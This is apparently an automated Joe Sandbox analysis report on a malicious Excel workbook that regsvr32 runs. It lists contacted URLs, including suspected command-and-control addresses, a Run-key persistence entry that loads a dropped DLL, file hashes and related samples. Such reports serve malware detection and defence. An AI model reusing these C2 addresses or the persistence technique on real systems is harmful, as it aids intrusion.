                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://analysis.windows.net/powerbi/api2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                    		high
                                                                    https://prod-global-autodetect.acompli.net/autodetect2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                      		high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                        		high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                          		high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                            		high
                                                                            https://ncus.contentsync.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                              		high
                                                                              https://18.117.84.120/kenichi/special21new/trailer2a5T0regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://18.117.84.120/89bregsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspx2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                  		high
                                                                                  https://apis.live.net/v5.0/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                    		high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                      		high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                        		high
                                                                                        https://management.azure.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                          		high
                                                                                          https://18.188.86.8/Zregsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://wus2.contentsync.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://incidents.diagnostics.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                            		high
                                                                                            https://clients.config.office.net/user/v1.0/ios2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                              		high
                                                                                              https://18.117.84.120/kenichi/special21new/trailer2a5regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp, regsvr32.exe, 00000019.00000002.634483097.0000000000A9A000.00000004.00000020.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                		high
                                                                                                https://o365auditrealtimeingestion.manage.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                    		high
                                                                                                    https://api.office.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                      		high
                                                                                                      https://incidents.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                        		high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                          		high
                                                                                                          https://entitlement.diagnostics.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                            		high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                		high
                                                                                                                https://storage.live.com/clientlogs/uploadlocation2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                  		high
                                                                                                                  https://templatelogging.office.com/client/log2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office365.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                      		high
                                                                                                                      https://webshell.suite.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                        		high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                          		high
                                                                                                                          https://18.188.86.8:443/kenichi/special21new/trailer2a55regsvr32.exe, 00000019.00000002.636079030.0000000002A44000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://management.azure.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorize2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://graph.windows.net/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                		high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://devnull.onenote.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://ncus.pagecontentsync.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://messaging.office.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://augloop.office.com/v22CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://skyapi.live.net/Activity/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown

                                                                                                                                              Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              8.8.7.7
                                                                                                                                              		unknownUnited States
                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                              107.180.50.232
                                                                                                                                              		tpfcu.comUnited States
                                                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                                              18.117.84.120
                                                                                                                                              		unknownUnited States
                                                                                                                                              		3MIT-GATEWAYSUStrue

                                                                                                                                              Private

                                                                                                                                              IP
                                                                                                                                              192.168.2.1

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                              Analysis ID:431937
                                                                                                                                              Start date:09.06.2021
                                                                                                                                              Start time:15:20:54
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 8m 4s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:light
                                                                                                                                              Sample file name:Documents_13134976_1377491379.xlsb
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Number of analysed new started processes analysed:35
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSB@28/13@1/4
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:
                                                                                                                                              • Successful, ratio: 88.3% (good quality ratio 83.8%)
                                                                                                                                              • Quality average: 70.5%
                                                                                                                                              • Quality standard deviation: 29%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 70%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Found warning dialog
                                                                                                                                              • Click Ok
                                                                                                                                              • Found warning dialog
                                                                                                                                              • Click Ok
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              Warnings:
                                                                                                                                              Show All
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 104.43.193.48, 92.122.145.220, 52.255.188.83, 52.109.76.68, 52.109.12.22, 20.82.210.154, 2.20.142.209, 2.20.142.210, 20.54.104.15, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.20.56, 20.50.102.62
                                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/431937/sample/Documents_13134976_1377491379.xlsb

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              15:22:03API Interceptor9x Sleep call for process: regsvr32.exe modified
                                                                                                                                              15:22:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSR C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                              15:22:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSR C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              18.117.84.120sample.ocxGet hashmaliciousBrowse

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                AS-26496-GO-DADDY-COM-LLCUS#U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                research-531942606.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-121105165.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-76934760.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-1960540844.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-1110827633.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 148.66.138.158
                                                                                                                                                New Order.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                DocumentScanCopy202_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 148.66.138.158
                                                                                                                                                NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                qXDtb88hht.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Telex_Payment.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                SOA #093732.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.62.195.83
                                                                                                                                                rHk5KU7bfT.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                MIT-GATEWAYSUSsample.ocxGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                PsNZLytUyV.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                networkservice.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.20.124.79
                                                                                                                                                file.msg.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.30.52.76
                                                                                                                                                Update-KB1484-x86.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.30.52.79
                                                                                                                                                nT7K5GG5kmGet hashmaliciousBrowse
                                                                                                                                                • 19.35.22.33
                                                                                                                                                KnAY2OIPI3Get hashmaliciousBrowse
                                                                                                                                                • 19.252.51.218
                                                                                                                                                x86_unpackedGet hashmaliciousBrowse
                                                                                                                                                • 19.60.14.26
                                                                                                                                                rIbyGX66OpGet hashmaliciousBrowse
                                                                                                                                                • 19.21.98.61
                                                                                                                                                4JQil8gLKdGet hashmaliciousBrowse
                                                                                                                                                • 19.170.175.72
                                                                                                                                                IMG001.exeGet hashmaliciousBrowse
                                                                                                                                                • 19.241.222.80
                                                                                                                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                                                                                                                • 19.160.35.138
                                                                                                                                                FB11.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                messg_02620000_deupx - Copy.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.39
                                                                                                                                                HUahIwV82u.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                R8WWx5t2RE.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.41.89.186
                                                                                                                                                KCCAfipQl2.dllGet hashmaliciousBrowse
                                                                                                                                                • 19.3.169.121
                                                                                                                                                fOMSAB0Sfe.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                530000.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                networkmanagerGet hashmaliciousBrowse
                                                                                                                                                • 19.211.36.11

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                8916410db85077a5460817142dcbc8desample.ocxGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                samp.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                UJFcKUqgmf.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                1c2102da_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                34d0a579_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                3f3cb269_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                fTXDq_9l7R2B0vcJRNsxuiqMxwPxzPi4LKezkpuCM_E.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                huqgk.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                publiclicense.vbsGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                Ei8IYTWG2j.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                IU7lKa778w.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                oi5zrjsKJG.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.RiskTool.Win32.BitCoinMiner.vho.31244.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                b49zEBfIlL.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.UDS.Trojan.Win32.Injuke.25486.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                XLhw6JGwC0.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.UDS.Trojan.Win32.Bsymem.19574.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.Program.Win32.Wacapew.Cml.8809.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                ai8HRya7D6.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.FileRepMalware.16835.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                Bills Pending Approval.htmlGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                GDrVYvtzuO.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                9E7YOr0kp1.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                aKdhpWlFPg.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                vSYEHJjK1G.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                FaceCheck - Installer.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                analysis-31947858.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                Julie.randall Completed REFERRAL AGREEMENT 60926.htmlGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                DPSGNwkO1Z.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                x1Q123VhUa.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                Snc3sPQ2yl.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                nU8kVKVAc8.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                tmp_Client-Status-062021-952177.vbsGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                analysis-1593377733.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                research-531942606.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                New order_doc.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                06.08.21 Inv & AP Statement - Copy.htmGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                #Ud83d#Udda8rocket.com 1208421(69-queue-2615.htmGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                research-121105165.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232

                                                                                                                                                Dropped Files

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                C:\Users\user\AppData\Local\Temp\L3YD7CE.dllsample.ocxGet hashmaliciousBrowse
                                                                                                                                                  C:\Users\user\iepfusn.dllsample.ocxGet hashmaliciousBrowse
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllsample.ocxGet hashmaliciousBrowse

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60080
                                                                                                                                                      Entropy (8bit):7.995256720209506
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
                                                                                                                                                      MD5:6045BACCF49E1EBA0E674945311A06E6
                                                                                                                                                      SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
                                                                                                                                                      SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
                                                                                                                                                      SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):328
                                                                                                                                                      Entropy (8bit):3.132472625894721
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:kKgy3Pse8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:4Ks8kPlE99SNxAhUe3OMx
                                                                                                                                                      MD5:B84815C12C603EC6FB8D1EDA4CA29530
                                                                                                                                                      SHA1:CD18E3BC8FCFB385C1225EF5ED0FCF1BD9DF0434
                                                                                                                                                      SHA-256:961CA06C24F3E4B504765841EFB908C623E99B0EC81EBB6804928909F4360E52
                                                                                                                                                      SHA-512:7771C7B0CC1743F21C13270B0B8390410E1BBD9BB849F9DF045F5A9976B99A169328F257CD09403420C24B62275F332CE54909F8603970F07C71C90501984D2F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: p...... .........<..~]..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2CA63FBD-E4D0-4324-9237-CB578953FC60
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):134915
                                                                                                                                                      Entropy (8bit):5.369271958078095
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:REQ9DQW+zAXOe
                                                                                                                                                      MD5:76B550BC14095A4AFBB5E04BE5F42175
                                                                                                                                                      SHA1:2A74379C0333997DFED5BB5F7BDB7F707BAF68E4
